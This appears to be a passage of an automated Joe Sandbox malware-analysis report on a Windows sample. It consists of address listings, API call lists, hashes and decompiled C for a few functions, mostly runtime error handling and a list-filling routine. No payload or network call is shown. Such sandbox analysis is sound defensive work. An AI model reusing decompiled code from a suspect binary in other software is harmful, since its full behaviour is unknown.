                                                                                                                              0x00403500
                                                                                                                              0x00403504
                                                                                                                              0x00403504
                                                                                                                              0x00403509
                                                                                                                              0x00403511
                                                                                                                              0x0040350b
                                                                                                                              0x0040350b
                                                                                                                              0x0040350b
                                                                                                                              0x0040351c
                                                                                                                              0x00403524
                                                                                                                              0x00403528
                                                                                                                              0x00000000
                                                                                                                              0x00403528
                                                                                                                              0x004034eb
                                                                                                                              0x004034f5
                                                                                                                              0x004034f9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004034f9
                                                                                                                              0x00403464
                                                                                                                              0x0040346e
                                                                                                                              0x00403472
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403472
                                                                                                                              0x00403447
                                                                                                                              0x00403412
                                                                                                                              0x0040341c
                                                                                                                              0x00403420
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403420
                                                                                                                              0x004033f5
                                                                                                                              0x00000000
                                                                                                                              0x004033ce
                                                                                                                              0x004033af
                                                                                                                              0x00403683
                                                                                                                              0x00403686
                                                                                                                              0x00403688
                                                                                                                              0x00403691
                                                                                                                              0x00403691
                                                                                                                              0x00403693
                                                                                                                              0x0040368a
                                                                                                                              0x0040368a
                                                                                                                              0x0040368a
                                                                                                                              0x00403696
                                                                                                                              0x00403698
                                                                                                                              0x00000000
                                                                                                                              0x0040369a
                                                                                                                              0x0040369a
                                                                                                                              0x0040369c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040369e
                                                                                                                              0x0040369e
                                                                                                                              0x004036a1
                                                                                                                              0x004036a1
                                                                                                                              0x004036a4
                                                                                                                              0x004036a9
                                                                                                                              0x004036aa
                                                                                                                              0x004036af
                                                                                                                              0x004036af
                                                                                                                              0x004036b4
                                                                                                                              0x004036ba
                                                                                                                              0x004036bd
                                                                                                                              0x004036c1
                                                                                                                              0x004036c7
                                                                                                                              0x004036c7
                                                                                                                              0x00000000
                                                                                                                              0x004036a1
                                                                                                                              0x00403698
                                                                                                                              0x004031fd
                                                                                                                              0x004031ff
                                                                                                                              0x00403201
                                                                                                                              0x004032ee
                                                                                                                              0x004032ee
                                                                                                                              0x004032f0
                                                                                                                              0x004032f3
                                                                                                                              0x004032f3
                                                                                                                              0x00000000
                                                                                                                              0x004032f0
                                                                                                                              0x00403207
                                                                                                                              0x0040320a
                                                                                                                              0x0040320e
                                                                                                                              0x00403211
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040321a
                                                                                                                              0x0040321c
                                                                                                                              0x004032ea
                                                                                                                              0x004032ea
                                                                                                                              0x00000000
                                                                                                                              0x004032ea
                                                                                                                              0x00403222
                                                                                                                              0x00403224
                                                                                                                              0x00403228
                                                                                                                              0x00403230
                                                                                                                              0x00403230
                                                                                                                              0x00403233
                                                                                                                              0x00403236
                                                                                                                              0x00403239
                                                                                                                              0x0040323c
                                                                                                                              0x0040323c
                                                                                                                              0x00403245
                                                                                                                              0x0040324e
                                                                                                                              0x00403254
                                                                                                                              0x00403262
                                                                                                                              0x00403267
                                                                                                                              0x0040326c
                                                                                                                              0x004032dc
                                                                                                                              0x004032dc
                                                                                                                              0x004032df
                                                                                                                              0x004032e2
                                                                                                                              0x004032e4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004032e4
                                                                                                                              0x00403273
                                                                                                                              0x0040327b
                                                                                                                              0x00403288
                                                                                                                              0x0040328d
                                                                                                                              0x00403291
                                                                                                                              0x00403293
                                                                                                                              0x00403296
                                                                                                                              0x00403298
                                                                                                                              0x004032a8
                                                                                                                              0x004032a8
                                                                                                                              0x004032ad
                                                                                                                              0x004032b4
                                                                                                                              0x004032c7
                                                                                                                              0x004032d1
                                                                                                                              0x004032d6
                                                                                                                              0x004032da
                                                                                                                              0x004032da
                                                                                                                              0x00000000
                                                                                                                              0x004032da
                                                                                                                              0x0040329a
                                                                                                                              0x004032a4
                                                                                                                              0x004032a6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004032a6
                                                                                                                              0x00403380
                                                                                                                              0x00403380
                                                                                                                              0x00000000
                                                                                                                              0x004031e3
                                                                                                                              0x004031e3
                                                                                                                              0x004031e8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004031ea
                                                                                                                              0x004036da
                                                                                                                              0x004036e1
                                                                                                                              0x004036e9
                                                                                                                              0x004036ea
                                                                                                                              0x004036ec
                                                                                                                              0x004036f4
                                                                                                                              0x00403701
                                                                                                                              0x00403701
                                                                                                                              0x004030d8
                                                                                                                              0x004030e5
                                                                                                                              0x004030ea
                                                                                                                              0x004030ec
                                                                                                                              0x00403197
                                                                                                                              0x00403197
                                                                                                                              0x00000000
                                                                                                                              0x00403197
                                                                                                                              0x00403107
                                                                                                                              0x0040310c
                                                                                                                              0x0040310f
                                                                                                                              0x00403113
                                                                                                                              0x00403120
                                                                                                                              0x00403120
                                                                                                                              0x00403128
                                                                                                                              0x0040312f
                                                                                                                              0x00403132
                                                                                                                              0x00403132
                                                                                                                              0x00403137
                                                                                                                              0x0040314b
                                                                                                                              0x00403151
                                                                                                                              0x0040315b
                                                                                                                              0x00403160
                                                                                                                              0x00403165
                                                                                                                              0x00403167
                                                                                                                              0x00403170
                                                                                                                              0x0040317c
                                                                                                                              0x00403186
                                                                                                                              0x00403190
                                                                                                                              0x00403195
                                                                                                                              0x00403195
                                                                                                                              0x00000000
                                                                                                                              0x00403165

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Startup_mbstowcs_memmove_sgethostname
                                                                                                                              • String ID: ISS Status
                                                                                                                              • API String ID: 2587487101-327169439
                                                                                                                              • Opcode ID: 1a62e96980a6812ddaaf3932ad8d3104401dc2a8225b52b89177bbb47fe4e59d
                                                                                                                              • Instruction ID: de067b323533a81b3d9ed114abe9a92f61ec3333bacc36b8aa9ab51c48ee874e
                                                                                                                              • Opcode Fuzzy Hash: 1a62e96980a6812ddaaf3932ad8d3104401dc2a8225b52b89177bbb47fe4e59d
                                                                                                                              • Instruction Fuzzy Hash: 4B22D571A043019BC724DF24C94166BBBE9EF84705F04492EF8856B385DB78EE45CBDA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00965C90 Relevance: 11.4, Strings: 8, Instructions: 1392COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: )<$)<$)<$)<$)<$0~-q$1~-q$1~-q
                                                                                                                              • API String ID: 0-3701865706
                                                                                                                              • Opcode ID: f2a35ccb1e20bead7533b3fba8a086829d6cdcf278f502fe4bf941658cab1d68
                                                                                                                              • Instruction ID: 827b680f2e6b48f316f778064673772c243f4683c6aeca5e3fe6d09f84c06fd8
                                                                                                                              • Opcode Fuzzy Hash: f2a35ccb1e20bead7533b3fba8a086829d6cdcf278f502fe4bf941658cab1d68
                                                                                                                              • Instruction Fuzzy Hash: 6EC2E6353187418FCB389E24C4A47AEB7E5ABC5354F754D1EE49ACB3E0DA359C409B42
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 009571E0 Relevance: 10.0, Strings: 7, Instructions: 1221COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: >Z9s$>Z9s$C)X$$C)X$$C)X$$invalid distance code$invalid literal/length code
                                                                                                                              • API String ID: 0-1529932342
                                                                                                                              • Opcode ID: c9a811079f4475cb7c1037302bb63d9d2e18851f20a7b1fd031d4a5ef0726f63
                                                                                                                              • Instruction ID: 5f648b20a9ddb05631fd04507b7e45ec6a0f7fbc3dc39d993ed389ae3f8c09e2
                                                                                                                              • Opcode Fuzzy Hash: c9a811079f4475cb7c1037302bb63d9d2e18851f20a7b1fd031d4a5ef0726f63
                                                                                                                              • Instruction Fuzzy Hash: 38C2077460C3818FC778CF69D4A0AAEB7E1BFD9311F24491EE99E87760DB3099458B42
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B3F9 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 85%
                                                                                                                              			E0041B3F9(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x43a6a8; // 0x2a5cd135
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x43c2b8 = _t6;
				 *0x43c2b4 = _t22;
				 *0x43c2b0 = _t25;
				 *0x43c2ac = _t21;
				 *0x43c2a8 = _t27;
				 *0x43c2a4 = _t26;
				 *0x43c2d0 = ss;
				 *0x43c2c4 = cs;
				 *0x43c2a0 = ds;
				 *0x43c29c = es;
				 *0x43c298 = fs;
				 *0x43c294 = gs;
				asm("pushfd");
				_pop( *0x43c2c8);
				 *0x43c2bc =  *_t31;
				 *0x43c2c0 = _v0;
				 *0x43c2cc =  &_a4;
				 *0x43c208 = 0x10001;
				_t11 =  *0x43c2c0; // 0x0
				 *0x43c1bc = _t11;
				 *0x43c1b0 = 0xc0000409;
				 *0x43c1b4 = 1;
				_t12 =  *0x43a6a8; // 0x2a5cd135
				_v812 = _t12;
				_t13 =  *0x43a6ac; // 0xd5a32eca
				_v808 = _t13;
				 *0x43c200 = IsDebuggerPresent();
				_push(1);
				E0041FF45(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x434814);
				if( *0x43c200 == 0) {
					_push(1);
					E0041FF45(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                              0x0041b3f9
                                                                                                                              0x0041b3f9
                                                                                                                              0x0041b3f9
                                                                                                                              0x0041b3f9
                                                                                                                              0x0041b3f9
                                                                                                                              0x0041b3f9
                                                                                                                              0x0041b3f9
                                                                                                                              0x0041b3ff
                                                                                                                              0x0041b401
                                                                                                                              0x0041b401
                                                                                                                              0x00420d95
                                                                                                                              0x00420d9a
                                                                                                                              0x00420da0
                                                                                                                              0x00420da6
                                                                                                                              0x00420dac
                                                                                                                              0x00420db2
                                                                                                                              0x00420db8
                                                                                                                              0x00420dbf
                                                                                                                              0x00420dc6
                                                                                                                              0x00420dcd
                                                                                                                              0x00420dd4
                                                                                                                              0x00420ddb
                                                                                                                              0x00420de2
                                                                                                                              0x00420de3
                                                                                                                              0x00420dec
                                                                                                                              0x00420df4
                                                                                                                              0x00420dfc
                                                                                                                              0x00420e07
                                                                                                                              0x00420e11
                                                                                                                              0x00420e16
                                                                                                                              0x00420e1b
                                                                                                                              0x00420e25
                                                                                                                              0x00420e2f
                                                                                                                              0x00420e34
                                                                                                                              0x00420e3a
                                                                                                                              0x00420e3f
                                                                                                                              0x00420e4b
                                                                                                                              0x00420e50
                                                                                                                              0x00420e52
                                                                                                                              0x00420e5a
                                                                                                                              0x00420e65
                                                                                                                              0x00420e72
                                                                                                                              0x00420e74
                                                                                                                              0x00420e76
                                                                                                                              0x00420e7b
                                                                                                                              0x00420e8f

                                                                                                                              APIs
                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00420E45
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00420E5A
                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00434814), ref: 00420E65
                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00420E81
                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00420E88
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2579439406-0
                                                                                                                              • Opcode ID: 0e4cac447c1b7028c97d15a83dcab3ef9f29fe873979fa98c469b44711e0af91
                                                                                                                              • Instruction ID: a5941ae6055aca039c419815817680dc20ed9b533905bd4469f6bf5b46276129
                                                                                                                              • Opcode Fuzzy Hash: 0e4cac447c1b7028c97d15a83dcab3ef9f29fe873979fa98c469b44711e0af91
                                                                                                                              • Instruction Fuzzy Hash: E821C2B9905204DFDB00EFA4F98964A3BB4FB08310F40B1BAE948A7371E7B459818F0D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00970476 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00970482
                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0097054E
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0097056E
                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00970578
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 254469556-0
                                                                                                                              • Opcode ID: 560d2afc8367bb1a7224452219515821ce460ad1eb1c6e0766809c519166142d
                                                                                                                              • Instruction ID: 8f462285928ad1221b51a2ea38ae37b3d783136ed9cf7d92be671c686e6c87aa
                                                                                                                              • Opcode Fuzzy Hash: 560d2afc8367bb1a7224452219515821ce460ad1eb1c6e0766809c519166142d
                                                                                                                              • Instruction Fuzzy Hash: 76312775D1521CDBDB10EFA5D989BCCBBB8BF48704F1081AAE40DAB250EB719A848F45
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040CA90 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 290COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 65%
                                                                                                                              			E0040CA90(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t134;
				signed int _t136;
				intOrPtr _t142;
				intOrPtr* _t150;
				intOrPtr* _t152;
				signed int _t153;
				intOrPtr _t185;
				intOrPtr _t186;
				short _t188;
				signed int _t189;
				intOrPtr _t191;
				void* _t208;
				void* _t221;
				intOrPtr _t235;
				signed int _t236;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t246;
				intOrPtr _t247;
				signed int _t248;
				signed int _t249;
				intOrPtr _t250;
				signed int _t251;
				intOrPtr* _t252;
				intOrPtr _t254;
				signed int _t255;
				void* _t258;
				void* _t259;
				void* _t261;
				signed int _t262;
				signed int _t263;
				void* _t265;
				void* _t266;

				_t221 = __edx;
				_push(0xffffffff);
				_push(E00430796);
				_push( *[fs:0x0]);
				_t262 = _t261 - 0xa0;
				_t134 =  *0x43a6a8; // 0x2a5cd135
				 *(_t262 + 0x9c) = _t134 ^ _t262;
				_t136 =  *0x43a6a8; // 0x2a5cd135
				_push(_t136 ^ _t262);
				 *[fs:0x0] = _t262 + 0xb4;
				_t188 = 0;
				_t235 = __ecx;
				 *((intOrPtr*)(_t262 + 0x64)) = __ecx;
				 *((intOrPtr*)(_t262 + 0x28)) = 0;
				 *((intOrPtr*)(_t262 + 0x2c)) = 0;
				 *((intOrPtr*)(_t262 + 0x30)) = 0;
				 *((intOrPtr*)(_t262 + 0xc0)) = 0;
				E00401090( *((intOrPtr*)(__ecx + 0x804)), _t262 + 0x24);
				 *((intOrPtr*)(_t262 + 0x18)) = 0;
				 *((intOrPtr*)(_t262 + 0x1c)) = 0;
				 *((intOrPtr*)(_t262 + 0x20)) = 0;
				_push(_t262 + 0x14);
				 *((char*)(_t262 + 0xc0)) = 1;
				E00403880( *((intOrPtr*)(_t235 + 0x804)), _t221);
				_t142 =  *((intOrPtr*)(_t262 + 0x28));
				if(_t142 != 0) {
					_t197 =  *((intOrPtr*)(_t262 + 0x2c)) - _t142;
					_t224 = (0x92492493 * ( *((intOrPtr*)(_t262 + 0x2c)) - _t142) >> 0x20) + _t197 >> 4;
					_t147 = ((0x92492493 * ( *((intOrPtr*)(_t262 + 0x2c)) - _t142) >> 0x20) + _t197 >> 4 >> 0x1f) + _t224;
					__eflags = ((0x92492493 * ( *((intOrPtr*)(_t262 + 0x2c)) - _t142) >> 0x20) + _t197 >> 4 >> 0x1f) + _t224;
				} else {
					_t147 = 0;
				}
				_t225 = _t262 + 0xa0;
				E004072C0(_t262 + 0xa0, L"%d items", _t147);
				_t246 =  *((intOrPtr*)(_t235 + 0x800));
				_t263 = _t262 + 0xc;
				_t150 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t150 == _t188) {
					 *((intOrPtr*)(_t263 + 0x38)) = _t188;
				} else {
					_t186 =  *_t150(_t246, 0x404);
					_t263 = _t263 + 8;
					 *((intOrPtr*)(_t263 + 0x38)) = _t186;
				}
				_t247 =  *((intOrPtr*)(_t235 + 0x800));
				_t152 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t152 == _t188) {
					 *((intOrPtr*)(_t263 + 0x34)) = _t188;
				} else {
					_t185 =  *_t152(_t247, 0x406);
					_t263 = _t263 + 8;
					 *((intOrPtr*)(_t263 + 0x34)) = _t185;
				}
				_t258 = 0;
				while(1) {
					_t248 =  *(_t263 + 0x18);
					if(_t248 == 0) {
						break;
					}
					_t213 =  *((intOrPtr*)(_t263 + 0x1c)) - _t248;
					_t225 = (0x92492493 * ( *((intOrPtr*)(_t263 + 0x1c)) - _t248) >> 0x20) + _t213 >> 4;
					if(_t258 < ((0x92492493 * ( *((intOrPtr*)(_t263 + 0x1c)) - _t248) >> 0x20) + _t213 >> 4 >> 0x1f) + ((0x92492493 * ( *((intOrPtr*)(_t263 + 0x1c)) - _t248) >> 0x20) + _t213 >> 4)) {
						_t273 =  *((intOrPtr*)(_t188 + _t248 + 0x18)) - 8;
						if( *((intOrPtr*)(_t188 + _t248 + 0x18)) < 8) {
							_t42 = _t248 + 4; // 0x4
							_t254 = _t188 + _t42;
						} else {
							_t254 =  *((intOrPtr*)(_t188 + _t248 + 4));
						}
						if(E00401070( *((intOrPtr*)(_t235 + 0x804)), _t273, _t254) == 0) {
							_t255 =  *(_t263 + 0x18);
							 *((intOrPtr*)(_t263 + 0x3c)) = 0;
							 *((intOrPtr*)(_t263 + 0x40)) = 0;
							 *((intOrPtr*)(_t263 + 0x44)) = 0;
							 *((intOrPtr*)(_t263 + 0x48)) = 0;
							 *((intOrPtr*)(_t263 + 0x4c)) = 0;
							 *((intOrPtr*)(_t263 + 0x50)) = 0;
							 *((intOrPtr*)(_t263 + 0x54)) = 0;
							 *((intOrPtr*)(_t263 + 0x58)) = 0;
							 *((intOrPtr*)(_t263 + 0x5c)) = 0;
							 *((intOrPtr*)(_t263 + 0x60)) = 0;
							 *((intOrPtr*)(_t263 + 0x3c)) = 1;
							if(_t255 == 0 || _t258 >= ((0x92492493 * ( *((intOrPtr*)(_t263 + 0x1c)) - _t255) >> 0x20) +  *((intOrPtr*)(_t263 + 0x1c)) - _t255 >> 4 >> 0x1f) + ((0x92492493 * ( *((intOrPtr*)(_t263 + 0x1c)) - _t255) >> 0x20) +  *((intOrPtr*)(_t263 + 0x1c)) - _t255 >> 4)) {
								E0041AD33();
								_t255 =  *(_t263 + 0x18);
							}
							if( *((intOrPtr*)(_t188 + _t255 + 0x18)) < 8) {
								_t68 = _t255 + 4; // 0x4
								 *((intOrPtr*)(_t263 + 0x4c)) = _t188 + _t68;
							} else {
								 *((intOrPtr*)(_t263 + 0x4c)) =  *((intOrPtr*)(_t188 + _t255 + 4));
							}
							_t225 = _t263 + 0x6c;
							E0041B880(_t235, _t263 + 0x6c, 0, 0x34);
							_t266 = _t263 + 0xc;
							 *((intOrPtr*)(_t266 + 0x74)) = 0xffff0003;
							 *((intOrPtr*)(_t266 + 0x70)) = 0xffff0000;
							memcpy(_t266 + 0x78, _t266 + 0x44, 0xa << 2);
							_t263 = _t266 + 0xc;
							 *0x43babc( *((intOrPtr*)(_t263 + 0x40)), 0x1132, 0, _t266 + 0x68);
							_t235 =  *((intOrPtr*)(_t263 + 0x64));
						}
						_t258 = _t258 + 1;
						_t188 = _t188 + 0x1c;
						continue;
					}
					break;
				}
				_t259 = 0;
				_t189 = 0;
				__eflags = 0;
				while(1) {
					_t249 =  *(_t263 + 0x28);
					__eflags = _t249;
					_t236 =  *(_t263 + 0x2c);
					if(_t249 == 0) {
						break;
					}
					_t205 = _t236 - _t249;
					_t225 = (0x92492493 * (_t236 - _t249) >> 0x20) + _t205 >> 4;
					_t208 = ((0x92492493 * (_t236 - _t249) >> 0x20) + _t205 >> 4 >> 0x1f) + ((0x92492493 * (_t236 - _t249) >> 0x20) + _t205 >> 4);
					__eflags = _t259 - _t208;
					if(_t259 < _t208) {
						__eflags = _t259 - _t208;
						 *((intOrPtr*)(_t263 + 0x3c)) = 0;
						 *((intOrPtr*)(_t263 + 0x40)) = 0;
						 *((intOrPtr*)(_t263 + 0x44)) = 0;
						 *((intOrPtr*)(_t263 + 0x48)) = 0;
						 *((intOrPtr*)(_t263 + 0x4c)) = 0;
						 *((intOrPtr*)(_t263 + 0x50)) = 0;
						 *((intOrPtr*)(_t263 + 0x54)) = 0;
						 *((intOrPtr*)(_t263 + 0x58)) = 0;
						 *((intOrPtr*)(_t263 + 0x5c)) = 0;
						 *((intOrPtr*)(_t263 + 0x60)) = 0;
						 *((intOrPtr*)(_t263 + 0x3c)) = 1;
						if(_t259 >= _t208) {
							E0041AD33();
							_t249 =  *(_t263 + 0x28);
						}
						__eflags =  *((intOrPtr*)(_t189 + _t249 + 0x18)) - 8;
						if( *((intOrPtr*)(_t189 + _t249 + 0x18)) < 8) {
							_t103 = _t249 + 4; // 0x4
							 *((intOrPtr*)(_t263 + 0x4c)) = _t189 + _t103;
						} else {
							 *((intOrPtr*)(_t263 + 0x4c)) =  *((intOrPtr*)(_t189 + _t249 + 4));
						}
						E0041B880(_t236, _t263 + 0x6c, 0, 0x34);
						_t265 = _t263 + 0xc;
						_t225 = _t265 + 0x68;
						 *((intOrPtr*)(_t265 + 0x78)) = 0xffff0003;
						 *((intOrPtr*)(_t265 + 0x74)) = 0xffff0000;
						memcpy(_t265 + 0x7c, _t265 + 0x48, 0xa << 2);
						_t263 = _t265 + 0xc;
						 *0x43babc( *((intOrPtr*)(_t263 + 0x40)), 0x1132, 0, _t265 + 0x68);
						_t259 = _t259 + 1;
						_t189 = _t189 + 0x1c;
						continue;
					}
					break;
				}
				_t153 =  *(_t263 + 0x18);
				__eflags = _t153;
				if(_t153 != 0) {
					_t238 =  *((intOrPtr*)(_t263 + 0x1c));
					__eflags = _t153 - _t238;
					if(__eflags != 0) {
						_t252 = _t153 + 0x18;
						do {
							__eflags =  *_t252 - 8;
							if(__eflags >= 0) {
								_push( *((intOrPtr*)(_t252 - 0x14)));
								L0041A97D(0, _t238, _t252, __eflags);
								_t263 = _t263 + 4;
							}
							 *_t252 = 7;
							 *((intOrPtr*)(_t252 - 4)) = 0;
							 *((short*)(_t252 - 0x14)) = 0;
							_t252 = _t252 + 0x1c;
							_t225 = _t252 - 0x18;
							__eflags = _t252 - 0x18 - _t238;
						} while (__eflags != 0);
						_t153 =  *(_t263 + 0x18);
					}
					_push(_t153);
					_t153 = L0041A97D(0, _t238, _t249, __eflags);
					_t236 =  *(_t263 + 0x30);
					_t249 =  *(_t263 + 0x2c);
					_t263 = _t263 + 4;
				}
				__eflags = _t249;
				 *(_t263 + 0x18) = 0;
				 *((intOrPtr*)(_t263 + 0x1c)) = 0;
				 *((intOrPtr*)(_t263 + 0x20)) = 0;
				if(_t249 != 0) {
					__eflags = _t249 - _t236;
					if(__eflags != 0) {
						_t251 = _t249 + 0x18;
						__eflags = _t251;
						do {
							__eflags =  *_t251 - 8;
							if(__eflags >= 0) {
								_push( *((intOrPtr*)(_t251 - 0x14)));
								L0041A97D(0, _t236, _t251, __eflags);
								_t263 = _t263 + 4;
							}
							 *_t251 = 7;
							 *((intOrPtr*)(_t251 - 4)) = 0;
							 *((short*)(_t251 - 0x14)) = 0;
							_t251 = _t251 + 0x1c;
							__eflags = _t251 - 0x18 - _t236;
						} while (__eflags != 0);
						_t249 =  *(_t263 + 0x28);
					}
					_push(_t249);
					_t153 = L0041A97D(0, _t236, _t249, __eflags);
					_t263 = _t263 + 4;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t263 + 0xb4));
				_pop(_t237);
				_pop(_t250);
				_pop(_t191);
				__eflags =  *(_t263 + 0x9c) ^ _t263;
				return E0041B3F9(_t153, _t191,  *(_t263 + 0x9c) ^ _t263, _t225, _t237, _t250);
			}







































                                                                                                                              0x0040ca90
                                                                                                                              0x0040ca90
                                                                                                                              0x0040ca92
                                                                                                                              0x0040ca9d
                                                                                                                              0x0040ca9e
                                                                                                                              0x0040caa4
                                                                                                                              0x0040caab
                                                                                                                              0x0040cab6
                                                                                                                              0x0040cabd
                                                                                                                              0x0040cac5
                                                                                                                              0x0040cacb
                                                                                                                              0x0040cacd
                                                                                                                              0x0040cacf
                                                                                                                              0x0040cad3
                                                                                                                              0x0040cad7
                                                                                                                              0x0040cadb
                                                                                                                              0x0040caea
                                                                                                                              0x0040caf1
                                                                                                                              0x0040caf6
                                                                                                                              0x0040cafa
                                                                                                                              0x0040cafe
                                                                                                                              0x0040cb06
                                                                                                                              0x0040cb0d
                                                                                                                              0x0040cb15
                                                                                                                              0x0040cb1a
                                                                                                                              0x0040cb20
                                                                                                                              0x0040cb2a
                                                                                                                              0x0040cb35
                                                                                                                              0x0040cb3d
                                                                                                                              0x0040cb3d
                                                                                                                              0x0040cb22
                                                                                                                              0x0040cb22
                                                                                                                              0x0040cb22
                                                                                                                              0x0040cb40
                                                                                                                              0x0040cb4d
                                                                                                                              0x0040cb52
                                                                                                                              0x0040cb58
                                                                                                                              0x0040cb60
                                                                                                                              0x0040cb65
                                                                                                                              0x0040cb78
                                                                                                                              0x0040cb67
                                                                                                                              0x0040cb6d
                                                                                                                              0x0040cb6f
                                                                                                                              0x0040cb72
                                                                                                                              0x0040cb72
                                                                                                                              0x0040cb7c
                                                                                                                              0x0040cb87
                                                                                                                              0x0040cb8c
                                                                                                                              0x0040cb9f
                                                                                                                              0x0040cb8e
                                                                                                                              0x0040cb94
                                                                                                                              0x0040cb96
                                                                                                                              0x0040cb99
                                                                                                                              0x0040cb99
                                                                                                                              0x0040cba3
                                                                                                                              0x0040cbb0
                                                                                                                              0x0040cbb0
                                                                                                                              0x0040cbb6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040cbc0
